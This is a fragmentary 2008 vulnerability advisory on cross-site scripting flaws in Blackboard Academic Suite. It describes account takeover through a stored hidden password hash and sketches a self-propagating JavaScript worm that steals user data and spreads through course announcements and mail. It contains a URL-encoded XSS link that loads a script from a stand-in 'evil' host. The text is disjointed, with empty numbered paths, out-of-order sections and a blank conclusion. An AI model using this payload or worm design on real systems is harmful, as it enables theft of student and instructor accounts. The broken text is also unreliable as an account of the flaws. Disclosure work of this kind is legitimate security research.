blackboard-xss.txt
Posted on 27 March 2008
//////////////////////////////////////////////////////////////////////////////// //Note: //The full version of this report (in pdf format) available at my blog: //http://www.secskill.wordpress.com // OR : //http://www.scribd.com/doc/2363025/Blackboard-Academic-Suite-Multiple-XSS-Vulnerabilities- //////////////////////////////////////////////////////////////////////////////////////// Blackboard Academic Suites Multiple Cross Site Scripting Vulnerabilities Background: Blackboard Academic Suite Blackboard is an enterprise software solution for providing interactive learning and management capabilities for educational institutions. Platforms Affected: All versions (7.x and lower) Description: Combining XSS and some conditions already exists in Blackboard system. Vulnerable paths: 1/ 2/Add announcement page: (instructor access only) http://site.edu/bin/common/announcement.pl?action=ADD&course_id=_137839_1&render_type=EDITABLE&context=course Author: Duong Thanh - Knight4vn (knightvn (at) gmail.com or knight4vn (at) yahoo.com ) Vulnerabilities discovered: 12/2007 Vendor and Universities Contacted: 02/2008 Public disclosure: 03/2008 Explanation: The attacker reads all these information in a log file. After that, he gets a new user password sent to his email address by using Lost Password form. Analysis: Edit Personal Info page: http://site.edu/webapps/blackboard/execute/editUser?context=self_modify Blackboard stores encrypted user password in Edit Personal Info page: <INPUT TYPE="hidden" NAME="password" VALUE="CE0BFD15059B68D67688884D7A3D3E8C"> On this page: http://site.edu/bin/common/user.pl?action=MODIFY&context=PASSWORD Proof-of-concept: Steal.js PART II - MAKING A WEB-BASED WORM Just imagine what would happen if someone took advantage of these holes to create a javascript-based worm? Think about this scenario for a second: A black-hat guy wrote a worm and he send it to a person (for ex: an instructor). ANALYSIS: Blackboard does not filter on title of Announcement So we can take advantage of this persistent XSS to inject arbitrary script on the web page. The announcement will be posted on the front page. So once students log in The malicious script will have to be run at least one time. Students spread this worm by sending the infected link to their classmates and his other instructors via Send mail form of Blackboard. Here is what a student will be forced to send in the email. Encoded Version: Hi, http://site.edu/webapps/blackboard/execute/viewCatalog?type=Course&searchText=%94%3E%3C%73%63%72%69%70%74%20%73%72%63%20%3D%20%91%68%74%74%70%3A%2F%2F%65%76%69%6C%2F%77%6F%72%6D%2E%6A%73%92%3E%3C%2F%73%63%72%69%70%74%3E Proof-Of-Concept: worm.js Worm Features: Log all user info and send them to the attacker. Propanagate by Send mail form and create announcements with hidden malicious script. CONCLUSION:
